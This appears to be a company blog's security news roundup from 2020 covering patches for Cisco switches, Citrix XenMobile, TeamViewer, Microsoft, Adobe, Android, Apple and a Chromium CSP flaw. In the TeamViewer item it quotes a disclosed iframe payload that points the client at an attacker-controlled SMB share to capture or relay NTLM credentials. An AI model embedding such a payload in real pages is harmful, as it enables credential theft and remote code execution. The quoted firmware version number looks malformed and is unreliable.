Been a while, hasn’t it? After another brief hiatus, Threat Thursday returns with the most pertinent cyber security news of the past fortnight.
It’s a software special this week - with vital updates for Windows, Adobe and several popular business applications making the bulk of the headlines.
Latest Cisco Updates Flip the Switch on DoS Attacks
Some of Cisco’s most popular small business switches received an update last Thursday, following the discovery of a security flaw which exposed them all to debilitating DoS (Denial of Service) attacks.
The exploit, which was 0.4 points away from a ‘Critical’ grade on the Common Vulnerability Scoring System, stems from each switch’s flawed validation of IPv6 packets. As Cisco themselves explain in their security bulletin:
“The vulnerability is due to insufficient validation of incoming IPv6 traffic. An attacker could exploit this vulnerability by sending a crafted IPv6 packet through an affected device. A successful exploit could allow the attacker to cause an unexpected reboot of the switch, leading to a DoS condition.”
The vulnerable products, as identified by Cisco, are:
- 250 Series Smart Switches
- 350 Series Managed Switches
- 350X Series Stackable Managed Switches
- 550X Series Stackable Managed Switches
- Small Business 200 Series Smart Switches
- Small Business 300 Series Managed Switches
- Small Business 500 Series Stackable Managed Switches
As expected, however, updates have been made available to address these vulnerabilities. If you recognise any of the above switches as part of your infrastructure, now’s the time to check for the latest firmware version – in this case 188.8.131.52.
Note, however, that the Small Business 200, 300 and 500 series have entered the end-of-software-maintenance milestone. In other words: if these are still part of your infrastructure, consider upgrading to newer tech sharpish. We’d be happy to help – so get in touch if you need any further guidance.
It’s Anything but Zen for Citrix’s Endpoint Management
Citrix’s Endpoint Management system – otherwise known by the infinitely-preferable name of XenMobile - received updates this Tuesday to fix 5 critical vulnerabilities. If exploited, these vulnerabilities would grant remote attackers with administrative access to XenMobile servers.
Now, there’s a fair few affected servers, each suffering from different exploits and each vulnerable after certain firmware versions; it’s perhaps easiest to link you to Citrix’s own security bulletin so you can best identify your next steps from there. Whichever affected version you’re running, there’s links at the bottom of the page to the appropriate patches.
Note that cloud versions of these services have expectedly been patched, but according to Citrix’s own advice, “…hybrid rights users need to apply the upgrades to any on-premises instance", so do bear that in mind.
TeamViewer Exploit Allows for Uncomfortable Levels of Team Viewing
TeamViewer, the popular remote desktop application, has this week received a patch for a high-severity exploit which not only allowed hackers to bypass passwords on the TeamViewer client, but also perform remote code execution on compromised systems.
Specifically affecting the Windows version of TeamViewer Desktop, the problem stems from the improper quoting of uniform resource identifiers; and if that explanation wasn’t geeky enough for you, then put on those coke-bottle glasses, ‘cause it’s about to get a whole lot geekier.
Jeffrey Hoffman is the security engineer at Praetorian and the discloser of said flaw. According to his brief writeup:
“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>) that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share. Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
While that explanation may fly over the head of your humble Threat Thursday reporters, the MTeam’s more technically minded members will tell you this is no good thing. TeamViewer has since released updates for all versions from 8 through to 15, and that all-important security bulletin can be read here.
Mind the Edge of that Seat - It’s Time for the Month’s Latest OS Updates!
Ah yes, I thought we were overdue this one. It’s Threat Thursday’s least-exciting monthly update as Microsoft, Apple Android and Adobe dropped their big security patches in these past two weeks. Here’s what the three have been fixing up for us this August.
Over at Microsoft the fixes continue to hit the triple digits, with this latest update coming in at 120 across a series of the big M’s products. 2 of these are zero-day vulnerabilities, 17 are critical, and 103 are important. According to reports, those 2 zero-day vulnerabilities are already under active attack too.
As is almost always the case, the most critical fixes relate to Remote Code Execution vulnerabilities, the most pressing flaws in this case residing in Internet Explorer 11.
Over at Adobe, there’s a more humble update of 26 fixes across Adobe Lightroom, Adobe Acrobat and Adobe Reader. 11 of these were categorised as critical, including a Remote Code Execution vulnerability (take a drink!) in Adobe Reader DC. Lightroom suffered a similar exploit which allowed attackers to execute malicious DLL commands – this too has now been fixed.
Our Android chums came to the party a little earlier this month, dropping their update on the 3rd and providing 54 fixes for their popular operating system. Ranging in severity from ‘High’ to ‘Critical’, you better believe they address a series of Remote Code Execution vulnerabilities. These were found across multiple areas of the Android framework, including media functions, the Android system area and in its Qualcomm components (Qualcomm being the provider behind a number of Android device chips).
Finally, Apple has released fixes for its iCloud for Windows apps, across versions 11.3 and 7.20. The company are notoriously secretive when it comes to their security updates (and you can’t exactly set your watch to their schedule, either). Suffice to say, if you’re running either version, there’s security updates available, and you want ‘em.
Billions of Internet Users Just Dodged a Major Bullet
It’s been revealed that the Chrome, Opera and Edge browsers on Windows, Mac and Android were all susceptible to a serious zero-day flaw. The flaw exists in Chromium, the Google-developed coding environment that powers many popular browsers and relates to Content Security Policy (CSP) requests.
In his deep-dive (which is only for the true tech-geeks among us!), Gal Weizman of PerimeterX explains just what CSP means:
“Content Security Policy (CSP) is basically a set of rules set by the website that the browser's role here is to respect and enforce in the name of the website.
Chromium’s flaw affected potentially billions of users and has exposed some of the world’s biggest websites to compromise since March of last year -yet all is not as drastic as it seems.
The threat has only been classified as ‘moderate’ as the affected sites would have to have first been compromised by a Remote Code Execution (ain’t that just a running theme this week?). Yet as Gal argues, CSP is a security mechanism, and if it can’t protect against exploits even after the site has been breached, it’s failing to do its job properly.
Nonetheless, this flaw has not been observed in the wild, and has since been patched by the Chromium Project, so we all appear to have dodged that bullet. With the cat well and truly out of the bag now, however, it’s best to update your browser accordingly lest you fall prey to this one in future.
Well, that was a surprisingly threat-free Threat Thursday, huh? Here’s hoping next week’s just as kind to us. 2020 owes us that, at least.
Until then, why not sign up to our Threat Thursday newsletter?
Drop your email address in the box on the right➡️, and we’ll make sure you get the latest Threat Thursday updates in your inbox every week.